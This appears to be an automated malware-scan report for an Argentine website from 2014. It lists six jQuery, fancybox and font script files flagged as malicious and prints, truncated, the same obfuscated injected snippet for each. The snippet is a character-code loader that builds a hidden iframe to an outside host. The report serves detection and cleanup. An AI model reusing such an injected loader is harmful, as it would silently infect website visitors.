Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=instrumentalweb.com.ar
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://instrumentalweb.com.ar/ | 200 OK Content-Length: 18054 Content-Type: text/html | clean |
http://instrumentalweb.com.ar/js/jquery.tools/jquery.tools.min.js | 200 OK Content-Length: 4921 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,79,73,6b,7b,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,79,73,6b,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,79,73,6b,7b,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6a,68,7a,68,77,68,75,6a,6f,76,35,70,75, Antivirus reports:
| ||
http://instrumentalweb.com.ar/js/jquery-1.4.2.min.html | 200 OK Content-Length: 2 Content-Type: text/html | clean |
http://instrumentalweb.com.ar/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://instrumentalweb.com.ar/js/fancybox/jquery.mousewheel-3.0.2.pack.js | 200 OK Content-Length: 6078 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,79,73,6b,7b,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,79,73,6b,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,79,73,6b,7b,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6a,68,7a,68,77,68,75,6a,6f,76,35,70,75, Antivirus reports:
| ||
http://instrumentalweb.com.ar/js/fancybox/jquery.fancybox-1.3.1.js | 200 OK Content-Length: 29347 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,79,73,6b,7b,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,79,73,6b,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,79,73,6b,7b,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6a,68,7a,68,77,68,75,6a,6f,76,35,70,75, Antivirus reports:
| ||
http://instrumentalweb.com.ar/js/cufon/cufon-yui.js | 200 OK Content-Length: 23178 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,79,73,6b,7b,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,79,73,6b,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,79,73,6b,7b,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6a,68,7a,68,77,68,75,6a,6f,76,35,70,75, Antivirus reports:
| ||
http://instrumentalweb.com.ar/js/cufon/eurofurence_500.font.js | 200 OK Content-Length: 159844 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,79,73,6b,7b,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,79,73,6b,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,79,73,6b,7b,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6a,68,7a,68,77,68,75,6a,6f,76,35,70,75, Antivirus reports:
| ||
http://instrumentalweb.com.ar/js/scripts.js | 200 OK Content-Length: 6253 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,79,73,6b,7b,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,79,73,6b,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,79,73,6b,7b,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6a,68,7a,68,77,68,75,6a,6f,76,35,70,75, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: instrumentalweb.com.ar
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Jul 2014 17:39:23 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Accept-Ranges: bytes
Age: 0
ETag: "4686-4eab30eae0802"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 18054
Content-Length: 18054
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Fri, 08 Nov 2013 23:51:13 GMT
Set-Cookie2: WS_Tracker=a3f158f2.4ff080dcb40f0; path=/
X-Cache: MISS
X-Varnish: 398240175
...18054 bytes of data.
GET / HTTP/1.1
Host: instrumentalweb.com.ar
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Jul 2014 17:39:23 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Accept-Ranges: bytes
Age: 0
ETag: "4686-4eab30eae0802"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 18054
Content-Length: 18054
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Fri, 08 Nov 2013 23:51:13 GMT
Set-Cookie2: WS_Tracker=a3f158f2.4ff080dcb40f0; path=/
X-Cache: MISS
X-Varnish: 398240175
...18054 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: instrumentalweb.com.ar
Referer: http://www.google.com/search?q=instrumentalweb.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: instrumentalweb.com.ar
Referer: http://www.google.com/search?q=instrumentalweb.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.